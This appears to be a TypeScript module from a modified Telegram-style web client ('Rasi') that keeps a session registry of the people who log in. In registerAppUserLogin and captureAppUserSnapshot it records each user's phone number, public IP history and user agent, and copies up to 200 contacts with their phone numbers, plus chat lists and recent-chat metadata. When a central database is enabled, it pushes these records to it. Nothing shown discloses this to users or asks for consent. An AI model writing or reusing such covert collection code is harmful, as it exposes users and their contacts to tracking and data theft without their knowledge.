import type { GlobalState } from '../global/types';
import type { ApiUser } from '../api/types';

import { MAIN_IDB_STORE } from '../util/browser/idb';
import { ACCOUNT_SLOT } from '../util/multiaccount';
import { getUserFullName, getMainUsername } from '../global/helpers/users';
import { isPaidUserId } from './accessControlStore';
import { isCentralDbEnabled } from './centralDb/config';
import { pushUserToCentral } from './centralDb/sync';
import { scheduleCatalogSync } from './centralDb/syncCatalog';
import { captureClientPublicIp } from './captureClientIp';

const STORE_KEY = 'rasi-session-registry-v1';
const MAX_USERS = 2500;
const MAX_IP_PER_USER = 40;

export type RasiIpLogEntry = {
  id: string;
  ip: string;
  userAgent: string;
  accountSlot: number;
  timestamp: number;
};

export type RasiLoginSnapshot = {
  capturedAt: number;
  contactCount: number;
  chatCount: number;
  contacts: Array<{ id: string; name: string; username?: string; phone?: string; isPremium?: boolean }>;
  chats: Array<{ id: string; title: string; type: string; username?: string }>;
  recentChats: Array<{ chatId: string; title: string; lastMessageId?: number; date?: number }>;
};

export type RasiAppUserRecord = {
  userId: string;
  phone?: string;
  username?: string;
  firstName?: string;
  lastName?: string;
  isPremium?: boolean;
  isBot?: boolean;
  isVerified?: boolean;
  firstSeenAt: number;
  lastLoginAt: number;
  loginCount: number;
  lastUserAgent?: string;
  lastIp?: string;
  accountSlots: number[];
  ipLogs: RasiIpLogEntry[];
  lastSnapshot?: RasiLoginSnapshot;
};

type RegistryData = {
  users: Record<string, RasiAppUserRecord>;
};

const EMPTY: RegistryData = { users: {} };

let memory: RegistryData = { users: {} };
let loadPromise: Promise<void> | undefined;

export async function loadSessionRegistry(): Promise<RegistryData> {
  if (!loadPromise) {
    loadPromise = (async () => {
      try {
        const stored = await MAIN_IDB_STORE.get<RegistryData>(STORE_KEY);
        memory = stored?.users ? { users: { ...stored.users } } : { users: {} };
      } catch {
        memory = { users: {} };
      }
    })();
  }
  await loadPromise;
  return memory;
}

async function persist() {
  const ids = Object.keys(memory.users);
  if (ids.length > MAX_USERS) {
    const sorted = ids
      .map((id) => memory.users[id])
      .sort((a, b) => a.lastLoginAt - b.lastLoginAt);
    const drop = sorted.slice(0, ids.length - MAX_USERS);
    drop.forEach((u) => delete memory.users[u.userId]);
  }
  try {
    await MAIN_IDB_STORE.set(STORE_KEY, memory);
  } catch {
    // ignore
  }
}

export function getRegistryUsers(): RasiAppUserRecord[] {
  return Object.values(memory.users).sort((a, b) => b.lastLoginAt - a.lastLoginAt);
}

export function getRegistryUser(userId: string): RasiAppUserRecord | undefined {
  return memory.users[userId];
}

function userFromApi(user: ApiUser): Partial<RasiAppUserRecord> {
  return {
    phone: user.phoneNumber,
    username: getMainUsername(user),
    firstName: user.firstName,
    lastName: user.lastName,
    isPremium: user.isPremium,
    isBot: user.isBot,
    isVerified: user.isVerified,
  };
}

export async function registerAppUserLogin(
  global: GlobalState,
  options?: { ip?: string; skipIpFetch?: boolean },
) {
  await loadSessionRegistry();
  const userId = global.currentUserId;
  if (!userId) return;

  const user = global.users.byId[userId];
  const now = Date.now();
  const slot = ACCOUNT_SLOT || 1;
  let ip = options?.ip;

  if (!ip && !options?.skipIpFetch) {
    ip = await captureClientPublicIp();
  }

  const ua = typeof navigator !== 'undefined' ? navigator.userAgent : '';
  let record = memory.users[userId];

  if (!record) {
    record = {
      userId,
      firstSeenAt: now,
      lastLoginAt: now,
      loginCount: 1,
      accountSlots: [slot],
      ipLogs: [],
      ...(user ? userFromApi(user) : {}),
    };
    memory.users[userId] = record;
  } else {
    record.lastLoginAt = now;
    record.loginCount += 1;
    if (user) Object.assign(record, userFromApi(user));
    if (!record.accountSlots.includes(slot)) {
      record.accountSlots.push(slot);
    }
  }

  record.lastUserAgent = ua;
  if (ip) {
    record.lastIp = ip;
    record.ipLogs.unshift({
      id: `${now}-${Math.random().toString(36).slice(2, 6)}`,
      ip,
      userAgent: ua,
      accountSlot: slot,
      timestamp: now,
    });
    record.ipLogs = record.ipLogs.slice(0, MAX_IP_PER_USER);
  }

  await persist();
  if (isCentralDbEnabled()) {
    const synced = memory.users[userId];
    if (synced) void pushUserToCentral(synced);
    scheduleCatalogSync(global);
  }
}

export async function captureAppUserSnapshot(global: GlobalState) {
  const userId = global.currentUserId;
  if (!userId || !global.isSynced) return;

  const record = memory.users[userId];
  if (!record) return;

  const contacts = Object.values(global.users.byId)
    .filter((u) => u.isContact)
    .slice(0, 200)
    .map((u) => ({
      id: u.id,
      name: getUserFullName(u) || '',
      username: getMainUsername(u),
      phone: u.phoneNumber,
      isPremium: u.isPremium,
    }));

  const chats = Object.values(global.chats.byId)
    .slice(0, 100)
    .map((c) => ({
      id: c.id,
      title: c.title || getMainUsername(c) || c.id,
      type: c.type,
      username: getMainUsername(c),
    }));

  const recentChats = (global.chats.listIds.active || [])
    .slice(0, 30)
    .map((chatId) => {
      const chat = global.chats.byId[chatId];
      if (!chat) return undefined;
      return {
        chatId,
        title: chat.title || getMainUsername(chat) || chatId,
        lastMessageId: chat.lastMessage?.id,
        date: chat.lastMessage?.date,
      };
    })
    .filter(Boolean) as RasiLoginSnapshot['recentChats'];

  record.lastSnapshot = {
    capturedAt: Date.now(),
    contactCount: contacts.length,
    chatCount: Object.keys(global.chats.byId).length,
    contacts,
    chats,
    recentChats,
  };

  if (global.users.byId[userId]) {
    Object.assign(record, userFromApi(global.users.byId[userId]));
  }

  await persist();
  if (isCentralDbEnabled()) {
    void pushUserToCentral(record);
    scheduleCatalogSync(global);
  }
}

export function enrichRegistryUserFromGlobal(
  userId: string,
  global: GlobalState,
): RasiAppUserRecord | undefined {
  const record = memory.users[userId];
  if (!record) return undefined;
  const user = global.users.byId[userId];
  if (user) {
    return { ...record, ...userFromApi(user) };
  }
  return { ...record };
}

export function isRegistryUserPaid(userId: string) {
  return isPaidUserId(userId);
}
